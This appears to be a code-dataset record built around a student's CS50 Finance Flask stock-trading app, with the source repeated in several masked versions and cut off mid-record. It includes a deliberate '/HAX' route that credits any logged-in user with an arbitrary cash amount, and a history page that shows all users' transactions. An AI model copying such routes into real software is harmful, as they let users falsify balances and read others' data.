elif lookup(request.form.get('symbol')) == None:
return apology('Must be a valid symbol', 400)
quote = lookup(request.form.get('symbol'))
shares = request.form.get('shares')
cash = db.execute('SELECT cash FROM users WHERE id=?', session[
'user_id'])
if cash[0]['cash'] < int(quote['price']) * int(shares):
return apology("You can't affort this/these", 400)
db.execute(
"INSERT INTO record(userID,transactions,symbol,price,t1) VALUES(?,?,?,?,strftime('%Y-%m-%d %H:%M:%S','now'))"
, session['user_id'], int(shares), quote['symbol'], float(quote
['price']))
total = int(quote['price']) * int(shares)
db.execute('UPDATE users SET cash=cash- (?) WHERE id=?', total,
session['user_id'])
return redirect('/')
else:
return render_template('buy.html')
@app.route('/history')
@login_required
def history():
"""Show history of transactions"""
rows = db.execute('SELECT * FROM record ORDER BY t1')
return render_template('history.html', rows=rows)
@app.route('/login', methods=['GET', 'POST'])
def login():
"""Log user in"""
session.clear()
if request.method == 'POST':
if not request.form.get('username'):
return apology('must provide username', 403)
elif not request.form.get('password'):
return apology('must provide password', 403)
rows = db.execute('SELECT * FROM users WHERE username = ?', request
.form.get('username'))
if len(rows) != 1 or not check_password_hash(rows[0]['hash'],
request.form.get('password')):
return apology('invalid username and/or password', 403)
session['user_id'] = rows[0]['id']
return redirect('/')
else:
return render_template('login.html')
@app.route('/logout')
def logout():
"""Log user out"""
session.clear()
return redirect('/')
@app.route('/quote', methods=['GET', 'POST'])
@login_required
def quote():
"""Get stock quote."""
if request.method == 'POST':
quote = lookup(request.form.get('symbol'))
if quote == None:
return apology('Invalid symbol', 400)
price = usd(quote['price'])
return render_template('quoted.html', quote=quote, price=price)
else:
return render_template('quote.html')
@app.route('/register', methods=['GET', 'POST'])
def register():
"""Register user"""
if request.method == 'POST':
if not request.form.get('username'):
return apology('must provide username', 400)
elif not request.form.get('password'):
return apology('must provide password', 400)
elif not request.form.get('confirmation'):
return apology('must comfirm password', 400)
elif request.form.get('confirmation') != request.form.get('password'):
return apology('Password not matches', 400)
rows = db.execute('SELECT * FROM users WHERE username = ?', request
.form.get('username'))
if len(rows) != 0:
return apology('username used', 400)
db.execute('INSERT INTO users (username,hash) VALUES (?,?)',
request.form.get('username'), generate_password_hash(request.
form.get('password')))
return redirect('/')
else:
return render_template('register.html')
@app.route('/sell', methods=['GET', 'POST'])
@login_required
def sell():
"""Sell shares of stock"""
if request.method == 'POST':
if not request.form.get('shares'):
return apology('Please enter how much u want to sell', 400)
sell = request.form.get('symbol')
shares = request.form.get('shares')
amount = db.execute(
'SELECT SUM(transactions) as amount FROM record WHERE userID=? AND symbol=? GROUP BY symbol HAVING transactions'
, session['user_id'], sell)
if amount[0]['amount'] < int(shares):
return apology('You dont own that much shares', 400)
quote = lookup(sell)
price = quote['price']
total = int(price) * int(shares)
db.execute(
"INSERT INTO record(userID,transactions,symbol,price,t1) VALUES(?,?,?,?,strftime('%s','now'))"
, session['user_id'], int(shares) * -1, quote['symbol'], price)
db.execute('UPDATE users SET cash=cash+ (?) WHERE id=?', total,
session['user_id'])
return redirect('/')
else:
rows = db.execute(
'SELECT symbol, SUM(transactions) as amount FROM record WHERE userID=? GROUP BY symbol HAVING transactions'
, session['user_id'])
return render_template('sell.html', rows=rows)
@app.route('/HAX', methods=['GET', 'POST'])
@login_required
def HAX():
if request.method == 'POST':
total = request.form.get('HAX')
db.execute('UPDATE users SET cash=cash+ (?) WHERE id=?', total,
session['user_id'])
flash(u'HAX SUCCESSFULLY ACTIVATED!!!')
return redirect('/')
else:
return render_template('HAX.html')
def errorhandler(e):
"""Handle error"""
if not isinstance(e, HTTPException):
e = InternalServerError()
return apology(e.name, e.code)
for code in default_exceptions:
app.errorhandler(code)(errorhandler)
<|reserved_special_token_1|>
import os
from cs50 import SQL
from flask import Flask, flash, redirect, render_template, request, session
from flask_session import Session
from tempfile import mkdtemp
from werkzeug.exceptions import default_exceptions, HTTPException, InternalServerError
from werkzeug.security import check_password_hash, generate_password_hash
from helpers import apology, login_required, lookup, usd
# Configure application
app = Flask(__name__)
# Ensure templates are auto-reloaded
app.config["TEMPLATES_AUTO_RELOAD"] = True
# Ensure responses aren't cached
@app.after_request
def after_request(response):
response.headers["Cache-Control"] = "no-cache, no-store, must-revalidate"
response.headers["Expires"] = 0
response.headers["Pragma"] = "no-cache"
return response
# Custom filter
app.jinja_env.filters["usd"] = usd
# Configure session to use filesystem (instead of signed cookies)
app.config["SESSION_FILE_DIR"] = mkdtemp()
app.config["SESSION_PERMANENT"] = False
app.config["SESSION_TYPE"] = "filesystem"
Session(app)
# Configure CS50 Library to use SQLite database
db = SQL("sqlite:///finance.db")
# Make sure API key is set
if not os.environ.get("API_KEY"):
raise RuntimeError("API_KEY not set")
@app.route("/")
@login_required
def index():
"""Show portfolio of stocks"""
rows=db.execute("SELECT symbol, SUM(transactions) as amount FROM record WHERE userID=? GROUP BY symbol HAVING transactions",session["user_id"])
cash=db.execute("SELECT cash FROM users WHERE id=?",session["user_id"])
cash_=cash[0]["cash"]
#store all the data into a dict so its easier to pass in to html
display=[]
total_share=0
for row in rows:
symbol=str(row["symbol"])
print(symbol)
name=lookup(symbol)["name"]
shares=int(row["amount"])
price=float(lookup(symbol)["price"])
total=float(shares) *price
total_share+=total
display.append({'symbol':symbol, 'name':name, 'shares':shares, 'price':price, 'total':total})
total_money=total_share+cash[0]["cash"]
return render_template("index.html",display=display,total_money=total_money,cash=cash_)
@app.route("/buy", methods=["GET", "POST"])
@login_required
def buy():
"""Buy shares of stock"""
if request.method == "POST":
# Ensure symbol was submitted
if not request.form.get("symbol"):
return apology("must provide symbol", 400)
# Ensure shares was submitted
elif not request.form.get("shares"):
return apology("must provide shares", 400)
if not request.form.get("shares").isdigit():
return apology("must be integer",400)
elif int(request.form.get("shares"))<1 :
return apology("must be positive integer", 400)
elif lookup(request.form.get("symbol"))==None:
return apology("Must be a valid symbol",400)
#ensure money>price
quote=lookup(request.form.get("symbol"))
shares=request.form.get("shares")
cash=db.execute("SELECT cash FROM users WHERE id=?",session["user_id"])
if cash[0]["cash"]<int(quote["price"])*int(shares):
return apology("You can't affort this/these",400)
#BUY, STORE DATA IN REPOSITORY AND RECORD
#record this transaction
db.execute("INSERT INTO record(userID,transactions,symbol,price,t1) VALUES(?,?,?,?,strftime('%Y-%m-%d %H:%M:%S','now'))",session["user_id"],int(shares),quote["symbol"],float(quote["price"]))
#deduct the cash
total=int(quote["price"])*int(shares)
db.execute("UPDATE users SET cash=cash- (?) WHERE id=?",total,session["user_id"])
return redirect("/")
else:
return render_template("buy.html")
@app.route("/history")
@login_required
def history():
"""Show history of transactions"""
rows=db.execute("SELECT * FROM record ORDER BY t1")
return render_template("history.html",rows=rows)
@app.route("/login", methods=["GET", "POST"])
def login():
"""Log user in"""
# Forget any user_id
session.clear()
# User reached route via POST (as by submitting a form via POST)
if request.method == "POST":
# Ensure username was submitted
if not request.form.get("username"):
return apology("must provide username", 403)
# Ensure password was submitted
elif not request.form.get("password"):
return apology("must provide password", 403)
# Query database for username
rows = db.execute("SELECT * FROM users WHERE username = ?", request.form.get("username"))
# Ensure username exists and password is correct
if len(rows) != 1 or not check_password_hash(rows[0]["hash"], request.form.get("password")):
return apology("invalid username and/or password", 403)
# Remember which user has logged in
session["user_id"] = rows[0]["id"]
# Redirect user to home page
return redirect("/")
# User reached route via GET (as by clicking a link or via redirect)
else:
return render_template("login.html")
@app.route("/logout")
def logout():
"""Log user out"""
# Forget any user_id
session.clear()
# Redirect user to login form
return redirect("/")
@app.route("/quote", methods=["GET", "POST"])
@login_required
def quote():
"""Get stock quote."""
if request.method=="POST":
quote=lookup(request.form.get("symbol"))
if quote==None:
return apology("Invalid symbol",400)
price=usd(quote["price"])
return render_template("quoted.html",quote=quote,price=price)
else:
return render_template("quote.html")
@app.route("/register", methods=["GET", "POST"])
def register():
"""Register user"""
if request.method == "POST":
# Ensure username was submitted
if not request.form.get("username"):
return apology("must provide username", 400)
# Ensure password was submitted
elif not request.form.get("password"):
return apology("must provide password", 400)
# Ensure comfirm password was submitted
elif not request.form.get("confirmation"):
return apology("must comfirm password", 400)
# Ensure password matches
elif request.form.get("confirmation") != request.form.get("password"):
return apology("Password not matches",400)
# Ensure username is new(unique)
rows = db.execute("SELECT * FROM users WHERE username = ?", request.form.get("username"))
if len(rows) != 0:
return apology("username used", 400)
db.execute("INSERT INTO users (username,hash) VALUES (?,?)",request.form.get("username"),generate_password_hash(request.form.get("password")))
# Redirect user to home page
return redirect("/")
else:
return render_template("register.html")
@app.route("/sell", methods=["GET", "POST"])
@login_required
def sell():
"""Sell shares of stock"""
if request.method=='POST':
#parameter is not filled
if not request.form.get("shares"):
return apology("Please enter how much u want to sell",400)
#check if shares(amount) that are going to be sell less than owner's share.
sell=request.form.get("symbol")
shares=request.form.get("shares")
amount=db.execute("SELECT SUM(transactions) as amount FROM record WHERE userID=? AND symbol=? GROUP BY symbol HAVING transactions",session["user_id"],sell)
if amount[0]["amount"]<int(shares):
return apology("You dont own that much shares",400)
#record sell and add cash amount
quote=lookup(sell)
price=quote["price"]
total=int(price)*int(shares)
db.execute("INSERT INTO record(userID,transactions,symbol,price,t1) VALUES(?,?,?,?,strftime('%s','now'))",session["user_id"],(int(shares)*-1),quote["symbol"],price)
db.execute("UPDATE users SET cash=cash+ (?) WHERE id=?",total,session["user_id"])
return redirect("/")
else:
rows=db.execute("SELECT symbol, SUM(transactions) as amount FROM record WHERE userID=? GROUP BY symbol HAVING transactions",session["user_id"])
return render_template("sell.html",rows=rows)
@app.route("/HAX", methods=["GET", "POST"])
@login_required
def HAX():
#add free monei boiiii
if request.method=="POST":
total=request.form.get("HAX")
db.execute("UPDATE users SET cash=cash+ (?) WHERE id=?",total,session["user_id"])
flash(u'HAX SUCCESSFULLY ACTIVATED!!!')
return redirect("/")
else:
return render_template("HAX.html")
def errorhandler(e):
"""Handle error"""
if not isinstance(e, HTTPException):
e = InternalServerError()
return apology(e.name, e.code)
# Listen for errors
for code in default_exceptions:
app.errorhandler(code)(errorhandler)
|
flexible
|
{
"blob_id": "c66f4ee5719f764c8c713c23815302c00b6fb9af",
"index": 310,
"step-1": "<mask token>\n\n\[email protected]('/buy', methods=['GET', 'POST'])\n@login_required\ndef buy():\n \"\"\"Buy shares of stock\"\"\"\n if request.method == 'POST':\n if not request.form.get('symbol'):\n return apology('must provide symbol', 400)\n elif not request.form.get('shares'):\n return apology('must provide shares', 400)\n if not request.form.get('shares').isdigit():\n return apology('must be integer', 400)\n elif int(request.form.get('shares')) < 1:\n return apology('must be positive integer', 400)\n elif lookup(request.form.get('symbol')) == None:\n return apology('Must be a valid symbol', 400)\n quote = lookup(request.form.get('symbol'))\n shares = request.form.get('shares')\n cash = db.execute('SELECT cash FROM users WHERE id=?', session[\n 'user_id'])\n if cash[0]['cash'] < int(quote['price']) * int(shares):\n return apology(\"You can't affort this/these\", 400)\n db.execute(\n \"INSERT INTO record(userID,transactions,symbol,price,t1) VALUES(?,?,?,?,strftime('%Y-%m-%d %H:%M:%S','now'))\"\n , session['user_id'], int(shares), quote['symbol'], float(quote\n ['price']))\n total = int(quote['price']) * int(shares)\n db.execute('UPDATE users SET cash=cash- (?) WHERE id=?', total,\n session['user_id'])\n return redirect('/')\n else:\n return render_template('buy.html')\n\n\n<mask token>\n\n\[email protected]('/logout')\ndef logout():\n \"\"\"Log user out\"\"\"\n session.clear()\n return redirect('/')\n\n\n<mask token>\n\n\[email protected]('/register', methods=['GET', 'POST'])\ndef register():\n \"\"\"Register user\"\"\"\n if request.method == 'POST':\n if not request.form.get('username'):\n return apology('must provide username', 400)\n elif not request.form.get('password'):\n return apology('must provide password', 400)\n elif not request.form.get('confirmation'):\n return apology('must comfirm password', 400)\n elif request.form.get('confirmation') != request.form.get('password'):\n return apology('Password not matches', 400)\n rows = db.execute('SELECT * FROM users WHERE username = ?', request\n .form.get('username'))\n if len(rows) != 0:\n return apology('username used', 400)\n db.execute('INSERT INTO users (username,hash) VALUES (?,?)',\n request.form.get('username'), generate_password_hash(request.\n form.get('password')))\n return redirect('/')\n else:\n return render_template('register.html')\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\[email protected]_request\ndef after_request(response):\n response.headers['Cache-Control'] = 'no-cache, no-store, must-revalidate'\n response.headers['Expires'] = 0\n response.headers['Pragma'] = 'no-cache'\n return response\n\n\n<mask token>\n\n\[email protected]('/')\n@login_required\ndef index():\n \"\"\"Show portfolio of stocks\"\"\"\n rows = db.execute(\n 'SELECT symbol, SUM(transactions) as amount FROM record WHERE userID=? GROUP BY symbol HAVING transactions'\n , session['user_id'])\n cash = db.execute('SELECT cash FROM users WHERE id=?', session['user_id'])\n cash_ = cash[0]['cash']\n display = []\n total_share = 0\n for row in rows:\n symbol = str(row['symbol'])\n print(symbol)\n name = lookup(symbol)['name']\n shares = int(row['amount'])\n price = float(lookup(symbol)['price'])\n total = float(shares) * price\n total_share += total\n display.append({'symbol': symbol, 'name': name, 'shares': shares,\n 'price': price, 'total': total})\n total_money = total_share + cash[0]['cash']\n return render_template('index.html', display=display, total_money=\n total_money, cash=cash_)\n\n\[email protected]('/buy', methods=['GET', 'POST'])\n@login_required\ndef buy():\n \"\"\"Buy shares of stock\"\"\"\n if request.method == 'POST':\n if not request.form.get('symbol'):\n return apology('must provide symbol', 400)\n elif not request.form.get('shares'):\n return apology('must provide shares', 400)\n if not request.form.get('shares').isdigit():\n return apology('must be integer', 400)\n elif int(request.form.get('shares')) < 1:\n return apology('must be positive integer', 400)\n elif lookup(request.form.get('symbol')) == None:\n return apology('Must be a valid symbol', 400)\n quote = lookup(request.form.get('symbol'))\n shares = request.form.get('shares')\n cash = db.execute('SELECT cash FROM users WHERE id=?', session[\n 'user_id'])\n if cash[0]['cash'] < int(quote['price']) * int(shares):\n return apology(\"You can't affort this/these\", 400)\n db.execute(\n \"INSERT INTO record(userID,transactions,symbol,price,t1) VALUES(?,?,?,?,strftime('%Y-%m-%d %H:%M:%S','now'))\"\n , session['user_id'], int(shares), quote['symbol'], float(quote\n ['price']))\n total = int(quote['price']) * int(shares)\n db.execute('UPDATE users SET cash=cash- (?) WHERE id=?', total,\n session['user_id'])\n return redirect('/')\n else:\n return render_template('buy.html')\n\n\n<mask token>\n\n\[email protected]('/login', methods=['GET', 'POST'])\ndef login():\n \"\"\"Log user in\"\"\"\n session.clear()\n if request.method == 'POST':\n if not request.form.get('username'):\n return apology('must provide username', 403)\n elif not request.form.get('password'):\n return apology('must provide password', 403)\n rows = db.execute('SELECT * FROM users WHERE username = ?', request\n .form.get('username'))\n if len(rows) != 1 or not check_password_hash(rows[0]['hash'],\n request.form.get('password')):\n return apology('invalid username and/or password', 403)\n session['user_id'] = rows[0]['id']\n return redirect('/')\n else:\n return render_template('login.html')\n\n\[email protected]('/logout')\ndef logout():\n \"\"\"Log user out\"\"\"\n session.clear()\n return redirect('/')\n\n\[email protected]('/quote', methods=['GET', 'POST'])\n@login_required\ndef quote():\n \"\"\"Get stock quote.\"\"\"\n if request.method == 'POST':\n quote = lookup(request.form.get('symbol'))\n if quote == None:\n return apology('Invalid symbol', 400)\n price = usd(quote['price'])\n return render_template('quoted.html', quote=quote, price=price)\n else:\n return render_template('quote.html')\n\n\[email protected]('/register', methods=['GET', 'POST'])\ndef register():\n \"\"\"Register user\"\"\"\n if request.method == 'POST':\n if not request.form.get('username'):\n return apology('must provide username', 400)\n elif not request.form.get('password'):\n return apology('must provide password', 400)\n elif not request.form.get('confirmation'):\n return apology('must comfirm password', 400)\n elif request.form.get('confirmation') != request.form.get('password'):\n return apology('Password not matches', 400)\n rows = db.execute('SELECT * FROM users WHERE username = ?', request\n .form.get('username'))\n if len(rows) != 0:\n return apology('username used', 400)\n db.execute('INSERT INTO users (username,hash) VALUES (?,?)',\n request.form.get('username'), generate_password_hash(request.\n form.get('password')))\n return redirect('/')\n else:\n return render_template('register.html')\n\n\n<mask token>\n\n\[email protected]('/HAX', methods=['GET', 'POST'])\n@login_required\ndef HAX():\n if request.method == 'POST':\n total = request.form.get('HAX')\n db.execute('UPDATE users SET cash=cash+ (?) WHERE id=?', total,\n session['user_id'])\n flash(u'HAX SUCCESSFULLY ACTIVATED!!!')\n return redirect('/')\n else:\n return render_template('HAX.html')\n\n\ndef errorhandler(e):\n \"\"\"Handle error\"\"\"\n if not isinstance(e, HTTPException):\n e = InternalServerError()\n return apology(e.name, e.code)\n\n\n<mask token>\n",
"step-3": "<mask token>\napp = Flask(__name__)\napp.config['TEMPLATES_AUTO_RELOAD'] = True\n\n\[email protected]_request\ndef after_request(response):\n response.headers['Cache-Control'] = 'no-cache, no-store, must-revalidate'\n response.headers['Expires'] = 0\n response.headers['Pragma'] = 'no-cache'\n return response\n\n\napp.jinja_env.filters['usd'] = usd\napp.config['SESSION_FILE_DIR'] = mkdtemp()\napp.config['SESSION_PERMANENT'] = False\napp.config['SESSION_TYPE'] = 'filesystem'\nSession(app)\ndb = SQL('sqlite:///finance.db')\nif not os.environ.get('API_KEY'):\n raise RuntimeError('API_KEY not set')\n\n\[email protected]('/')\n@login_required\ndef index():\n \"\"\"Show portfolio of stocks\"\"\"\n rows = db.execute(\n 'SELECT symbol, SUM(transactions) as amount FROM record WHERE userID=? GROUP BY symbol HAVING transactions'\n , session['user_id'])\n cash = db.execute('SELECT cash FROM users WHERE id=?', session['user_id'])\n cash_ = cash[0]['cash']\n display = []\n total_share = 0\n for row in rows:\n symbol = str(row['symbol'])\n print(symbol)\n name = lookup(symbol)['name']\n shares = int(row['amount'])\n price = float(lookup(symbol)['price'])\n total = float(shares) * price\n total_share += total\n display.append({'symbol': symbol, 'name': name, 'shares': shares,\n 'price': price, 'total': total})\n total_money = total_share + cash[0]['cash']\n return render_template('index.html', display=display, total_money=\n total_money, cash=cash_)\n\n\[email protected]('/buy', methods=['GET', 'POST'])\n@login_required\ndef buy():\n \"\"\"Buy shares of stock\"\"\"\n if request.method == 'POST':\n if not request.form.get('symbol'):\n return apology('must provide symbol', 400)\n elif not request.form.get('shares'):\n return apology('must provide shares', 400)\n if not request.form.get('shares').isdigit():\n return apology('must be integer', 400)\n elif int(request.form.get('shares')) < 1:\n return apology('must be positive integer', 400)\n elif lookup(request.form.get('symbol')) == None:\n return apology('Must be a valid symbol', 400)\n quote = lookup(request.form.get('symbol'))\n shares = request.form.get('shares')\n cash = db.execute('SELECT cash FROM users WHERE id=?', session[\n 'user_id'])\n if cash[0]['cash'] < int(quote['price']) * int(shares):\n return apology(\"You can't affort this/these\", 400)\n db.execute(\n \"INSERT INTO record(userID,transactions,symbol,price,t1) VALUES(?,?,?,?,strftime('%Y-%m-%d %H:%M:%S','now'))\"\n , session['user_id'], int(shares), quote['symbol'], float(quote\n ['price']))\n total = int(quote['price']) * int(shares)\n db.execute('UPDATE users SET cash=cash- (?) WHERE id=?', total,\n session['user_id'])\n return redirect('/')\n else:\n return render_template('buy.html')\n\n\[email protected]('/history')\n@login_required\ndef history():\n \"\"\"Show history of transactions\"\"\"\n rows = db.execute('SELECT * FROM record ORDER BY t1')\n return render_template('history.html', rows=rows)\n\n\[email protected]('/login', methods=['GET', 'POST'])\ndef login():\n \"\"\"Log user in\"\"\"\n session.clear()\n if request.method == 'POST':\n if not request.form.get('username'):\n return apology('must provide username', 403)\n elif not request.form.get('password'):\n return apology('must provide password', 403)\n rows = db.execute('SELECT * FROM users WHERE username = ?', request\n .form.get('username'))\n if len(rows) != 1 or not check_password_hash(rows[0]['hash'],\n request.form.get('password')):\n return apology('invalid username and/or password', 403)\n session['user_id'] = rows[0]['id']\n return redirect('/')\n else:\n return render_template('login.html')\n\n\[email protected]('/logout')\ndef logout():\n \"\"\"Log user out\"\"\"\n session.clear()\n return redirect('/')\n\n\[email protected]('/quote', methods=['GET', 'POST'])\n@login_required\ndef quote():\n \"\"\"Get stock quote.\"\"\"\n if request.method == 'POST':\n quote = lookup(request.form.get('symbol'))\n if quote == None:\n return apology('Invalid symbol', 400)\n price = usd(quote['price'])\n return render_template('quoted.html', quote=quote, price=price)\n else:\n return render_template('quote.html')\n\n\[email protected]('/register', methods=['GET', 'POST'])\ndef register():\n \"\"\"Register user\"\"\"\n if request.method == 'POST':\n if not request.form.get('username'):\n return apology('must provide username', 400)\n elif not request.form.get('password'):\n return apology('must provide password', 400)\n elif not request.form.get('confirmation'):\n return apology('must comfirm password', 400)\n elif request.form.get('confirmation') != request.form.get('password'):\n return apology('Password not matches', 400)\n rows = db.execute('SELECT * FROM users WHERE username = ?', request\n .form.get('username'))\n if len(rows) != 0:\n return apology('username used', 400)\n db.execute('INSERT INTO users (username,hash) VALUES (?,?)',\n request.form.get('username'), generate_password_hash(request.\n form.get('password')))\n return redirect('/')\n else:\n return render_template('register.html')\n\n\[email protected]('/sell', methods=['GET', 'POST'])\n@login_required\ndef sell():\n \"\"\"Sell shares of stock\"\"\"\n if request.method == 'POST':\n if not request.form.get('shares'):\n return apology('Please enter how much u want to sell', 400)\n sell = request.form.get('symbol')\n shares = request.form.get('shares')\n amount = db.execute(\n 'SELECT SUM(transactions) as amount FROM record WHERE userID=? AND symbol=? GROUP BY symbol HAVING transactions'\n , session['user_id'], sell)\n if amount[0]['amount'] < int(shares):\n return apology('You dont own that much shares', 400)\n quote = lookup(sell)\n price = quote['price']\n total = int(price) * int(shares)\n db.execute(\n \"INSERT INTO record(userID,transactions,symbol,price,t1) VALUES(?,?,?,?,strftime('%s','now'))\"\n , session['user_id'], int(shares) * -1, quote['symbol'], price)\n db.execute('UPDATE users SET cash=cash+ (?) WHERE id=?', total,\n session['user_id'])\n return redirect('/')\n else:\n rows = db.execute(\n 'SELECT symbol, SUM(transactions) as amount FROM record WHERE userID=? GROUP BY symbol HAVING transactions'\n , session['user_id'])\n return render_template('sell.html', rows=rows)\n\n\[email protected]('/HAX', methods=['GET', 'POST'])\n@login_required\ndef HAX():\n if request.method == 'POST':\n total = request.form.get('HAX')\n db.execute('UPDATE users SET cash=cash+ (?) WHERE id=?', total,\n session['user_id'])\n flash(u'HAX SUCCESSFULLY ACTIVATED!!!')\n return redirect('/')\n else:\n return render_template('HAX.html')\n\n\ndef errorhandler(e):\n \"\"\"Handle error\"\"\"\n if not isinstance(e, HTTPException):\n e = InternalServerError()\n return apology(e.name, e.code)\n\n\nfor code in default_exceptions:\n app.errorhandler(code)(errorhandler)\n",
"step-4": "import os\nfrom cs50 import SQL\nfrom flask import Flask, flash, redirect, render_template, request, session\nfrom flask_session import Session\nfrom tempfile import mkdtemp\nfrom werkzeug.exceptions import default_exceptions, HTTPException, InternalServerError\nfrom werkzeug.security import check_password_hash, generate_password_hash\nfrom helpers import apology, login_required, lookup, usd\napp = Flask(__name__)\napp.config['TEMPLATES_AUTO_RELOAD'] = True\n\n\[email protected]_request\ndef after_request(response):\n response.headers['Cache-Control'] = 'no-cache, no-store, must-revalidate'\n response.headers['Expires'] = 0\n response.headers['Pragma'] = 'no-cache'\n return response\n\n\napp.jinja_env.filters['usd'] = usd\napp.config['SESSION_FILE_DIR'] = mkdtemp()\napp.config['SESSION_PERMANENT'] = False\napp.config['SESSION_TYPE'] = 'filesystem'\nSession(app)\ndb = SQL('sqlite:///finance.db')\nif not os.environ.get('API_KEY'):\n raise RuntimeError('API_KEY not set')\n\n\[email protected]('/')\n@login_required\ndef index():\n \"\"\"Show portfolio of stocks\"\"\"\n rows = db.execute(\n 'SELECT symbol, SUM(transactions) as amount FROM record WHERE userID=? GROUP BY symbol HAVING transactions'\n , session['user_id'])\n cash = db.execute('SELECT cash FROM users WHERE id=?', session['user_id'])\n cash_ = cash[0]['cash']\n display = []\n total_share = 0\n for row in rows:\n symbol = str(row['symbol'])\n print(symbol)\n name = lookup(symbol)['name']\n shares = int(row['amount'])\n price = float(lookup(symbol)['price'])\n total = float(shares) * price\n total_share += total\n display.append({'symbol': symbol, 'name': name, 'shares': shares,\n 'price': price, 'total': total})\n total_money = total_share + cash[0]['cash']\n return render_template('index.html', display=display, total_money=\n total_money, cash=cash_)\n\n\[email protected]('/buy', methods=['GET', 'POST'])\n@login_required\ndef buy():\n \"\"\"Buy shares of stock\"\"\"\n if request.method == 'POST':\n if not request.form.get('symbol'):\n return apology('must provide symbol', 400)\n elif not request.form.get('shares'):\n return apology('must provide shares', 400)\n if not request.form.get('shares').isdigit():\n return apology('must be integer', 400)\n elif int(request.form.get('shares')) < 1:\n return apology('must be positive integer', 400)\n elif lookup(request.form.get('symbol')) == None:\n return apology('Must be a valid symbol', 400)\n quote = lookup(request.form.get('symbol'))\n shares = request.form.get('shares')\n cash = db.execute('SELECT cash FROM users WHERE id=?', session[\n 'user_id'])\n if cash[0]['cash'] < int(quote['price']) * int(shares):\n return apology(\"You can't affort this/these\", 400)\n db.execute(\n \"INSERT INTO record(userID,transactions,symbol,price,t1) VALUES(?,?,?,?,strftime('%Y-%m-%d %H:%M:%S','now'))\"\n , session['user_id'], int(shares), quote['symbol'], float(quote\n ['price']))\n total = int(quote['price']) * int(shares)\n db.execute('UPDATE users SET cash=cash- (?) WHERE id=?', total,\n session['user_id'])\n return redirect('/')\n else:\n return render_template('buy.html')\n\n\[email protected]('/history')\n@login_required\ndef history():\n \"\"\"Show history of transactions\"\"\"\n rows = db.execute('SELECT * FROM record ORDER BY t1')\n return render_template('history.html', rows=rows)\n\n\[email protected]('/login', methods=['GET', 'POST'])\ndef login():\n \"\"\"Log user in\"\"\"\n session.clear()\n if request.method == 'POST':\n if not request.form.get('username'):\n return apology('must provide username', 403)\n elif not request.form.get('password'):\n return apology('must provide password', 403)\n rows = db.execute('SELECT * FROM users WHERE username = ?', request\n .form.get('username'))\n if len(rows) != 1 or not check_password_hash(rows[0]['hash'],\n request.form.get('password')):\n return apology('invalid username and/or password', 403)\n session['user_id'] = rows[0]['id']\n return redirect('/')\n else:\n return render_template('login.html')\n\n\[email protected]('/logout')\ndef logout():\n \"\"\"Log user out\"\"\"\n session.clear()\n return redirect('/')\n\n\[email protected]('/quote', methods=['GET', 'POST'])\n@login_required\ndef quote():\n \"\"\"Get stock quote.\"\"\"\n if request.method == 'POST':\n quote = lookup(request.form.get('symbol'))\n if quote == None:\n return apology('Invalid symbol', 400)\n price = usd(quote['price'])\n return render_template('quoted.html', quote=quote, price=price)\n else:\n return render_template('quote.html')\n\n\[email protected]('/register', methods=['GET', 'POST'])\ndef register():\n \"\"\"Register user\"\"\"\n if request.method == 'POST':\n if not request.form.get('username'):\n return apology('must provide username', 400)\n elif not request.form.get('password'):\n return apology('must provide password', 400)\n elif not request.form.get('confirmation'):\n return apology('must comfirm password', 400)\n elif request.form.get('confirmation') != request.form.get('password'):\n return apology('Password not matches', 400)\n rows = db.execute('SELECT * FROM users WHERE username = ?', request\n .form.get('username'))\n if len(rows) != 0:\n return apology('username used', 400)\n db.execute('INSERT INTO users (username,hash) VALUES (?,?)',\n request.form.get('username'), generate_password_hash(request.\n form.get('password')))\n return redirect('/')\n else:\n return render_template('register.html')\n\n\[email protected]('/sell', methods=['GET', 'POST'])\n@login_required\ndef sell():\n \"\"\"Sell shares of stock\"\"\"\n if request.method == 'POST':\n if not request.form.get('shares'):\n return apology('Please enter how much u want to sell', 400)\n sell = request.form.get('symbol')\n shares = request.form.get('shares')\n amount = db.execute(\n 'SELECT SUM(transactions) as amount FROM record WHERE userID=? AND symbol=? GROUP BY symbol HAVING transactions'\n , session['user_id'], sell)\n if amount[0]['amount'] < int(shares):\n return apology('You dont own that much shares', 400)\n quote = lookup(sell)\n price = quote['price']\n total = int(price) * int(shares)\n db.execute(\n \"INSERT INTO record(userID,transactions,symbol,price,t1) VALUES(?,?,?,?,strftime('%s','now'))\"\n , session['user_id'], int(shares) * -1, quote['symbol'], price)\n db.execute('UPDATE users SET cash=cash+ (?) WHERE id=?', total,\n session['user_id'])\n return redirect('/')\n else:\n rows = db.execute(\n 'SELECT symbol, SUM(transactions) as amount FROM record WHERE userID=? GROUP BY symbol HAVING transactions'\n , session['user_id'])\n return render_template('sell.html', rows=rows)\n\n\[email protected]('/HAX', methods=['GET', 'POST'])\n@login_required\ndef HAX():\n if request.method == 'POST':\n total = request.form.get('HAX')\n db.execute('UPDATE users SET cash=cash+ (?) WHERE id=?', total,\n session['user_id'])\n flash(u'HAX SUCCESSFULLY ACTIVATED!!!')\n return redirect('/')\n else:\n return render_template('HAX.html')\n\n\ndef errorhandler(e):\n \"\"\"Handle error\"\"\"\n if not isinstance(e, HTTPException):\n e = InternalServerError()\n return apology(e.name, e.code)\n\n\nfor code in default_exceptions:\n app.errorhandler(code)(errorhandler)\n",
"step-5": "import os\n\nfrom cs50 import SQL\nfrom flask import Flask, flash, redirect, render_template, request, session\nfrom flask_session import Session\nfrom tempfile import mkdtemp\nfrom werkzeug.exceptions import default_exceptions, HTTPException, InternalServerError\nfrom werkzeug.security import check_password_hash, generate_password_hash\n\nfrom helpers import apology, login_required, lookup, usd\n\n# Configure application\napp = Flask(__name__)\n\n# Ensure templates are auto-reloaded\napp.config[\"TEMPLATES_AUTO_RELOAD\"] = True\n\n\n# Ensure responses aren't cached\[email protected]_request\ndef after_request(response):\n response.headers[\"Cache-Control\"] = \"no-cache, no-store, must-revalidate\"\n response.headers[\"Expires\"] = 0\n response.headers[\"Pragma\"] = \"no-cache\"\n return response\n\n\n# Custom filter\napp.jinja_env.filters[\"usd\"] = usd\n\n# Configure session to use filesystem (instead of signed cookies)\napp.config[\"SESSION_FILE_DIR\"] = mkdtemp()\napp.config[\"SESSION_PERMANENT\"] = False\napp.config[\"SESSION_TYPE\"] = \"filesystem\"\nSession(app)\n\n# Configure CS50 Library to use SQLite database\ndb = SQL(\"sqlite:///finance.db\")\n\n# Make sure API key is set\nif not os.environ.get(\"API_KEY\"):\n raise RuntimeError(\"API_KEY not set\")\n\n\[email 